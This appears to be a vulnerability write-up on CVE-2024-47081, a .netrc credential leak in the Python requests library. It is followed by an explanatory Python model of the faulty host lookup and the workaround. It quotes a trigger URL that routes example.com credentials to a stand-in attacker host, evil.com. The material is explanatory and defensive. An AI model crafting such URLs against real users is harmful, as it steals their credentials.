CVE-2024-47081: Netrc credential leak in PSF requests library
a year ago
- #vulnerability
- #python
- #security
- PSF requests library leaks .netrc credentials to third parties due to incorrect URL processing.
- Vulnerability triggered by API call: `requests.get('http://example.com:@evil.com/')`.
- Credentials configured for example.com are leaked to evil.com.
- Root cause identified in requests/utils.py file.
- Vulnerability reported to maintainers on September 12, 2024, with no fix available.
- CVE-2024-47081 assigned by GitHub for this issue.
- Workaround: Explicitly specify credentials in API calls to disable .netrc access.
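The following is an added illustration, not code from the requests project or from the original post. It models the host lookup that the bullets above describe, using only the standard library: `flawed_netrc_host` reproduces the mistake of cutting `netloc` at the first `:` to strip a port (my reading of the pre-fix behaviour, stated as an assumption), `safe_netrc_host` uses the parser's own `hostname` instead, and `resolve_auth` shows why the workaround works: explicit credentials short-circuit the `.netrc` lookup entirely. The `NETRC` dict is a constructed stand-in for `~/.netrc`.

```python
from typing import Callable, Optional, Tuple
from urllib.parse import urlparse

# Constructed stand-in for ~/.netrc: machine -> (login, password).
# Only example.com has an entry; evil.com has none.
NETRC = {
    "example.com": ("alice", "s3cr3t"),
}

Creds = Tuple[str, str]


def flawed_netrc_host(url: str) -> str:
    """Host extraction modeled on the vulnerable lookup (assumption, not the
    library's code verbatim): take netloc and cut at the first ':' to strip a
    port. Userinfo before '@' is never considered, so for
    'http://example.com:@evil.com/' the 'host' becomes example.com even though
    the request goes to evil.com."""
    return urlparse(url).netloc.split(":")[0]


def safe_netrc_host(url: str) -> Optional[str]:
    """Ask the parser for the real host: .hostname already drops userinfo and
    the port, so credentials are keyed on where the request actually goes."""
    return urlparse(url).hostname


def netrc_lookup(url: str, host_fn: Callable[[str], Optional[str]]) -> Optional[Creds]:
    """Look up credentials for the host that host_fn extracts from the URL."""
    host = host_fn(url)
    return NETRC.get(host) if host else None


def resolve_auth(
    url: str,
    auth: Optional[Creds] = None,
    host_fn: Callable[[str], Optional[str]] = safe_netrc_host,
) -> Optional[Creds]:
    """Mirror the workaround from the page: explicitly supplied credentials win,
    and the .netrc lookup only runs when no auth was given."""
    if auth is not None:
        return auth
    return netrc_lookup(url, host_fn)


if __name__ == "__main__":
    url = "http://example.com:@evil.com/"
    print("flawed host :", flawed_netrc_host(url))      # example.com (wrong)
    print("safe host   :", safe_netrc_host(url))        # evil.com
    print("flawed auth :", resolve_auth(url, host_fn=flawed_netrc_host))
    print("safe auth   :", resolve_auth(url))
    print("explicit    :", resolve_auth(url, auth=("bob", "pw"), host_fn=flawed_netrc_host))
```

Running it shows the leak in miniature: the flawed lookup hands example.com's credentials to a request bound for evil.com, the hostname-based lookup finds nothing for evil.com, and passing `auth=` explicitly never consults the `.netrc` stand-in at all. The flawed split also misfires the other way for ordinary `user:pw@host` URLs, where it would look up `user` instead of the host.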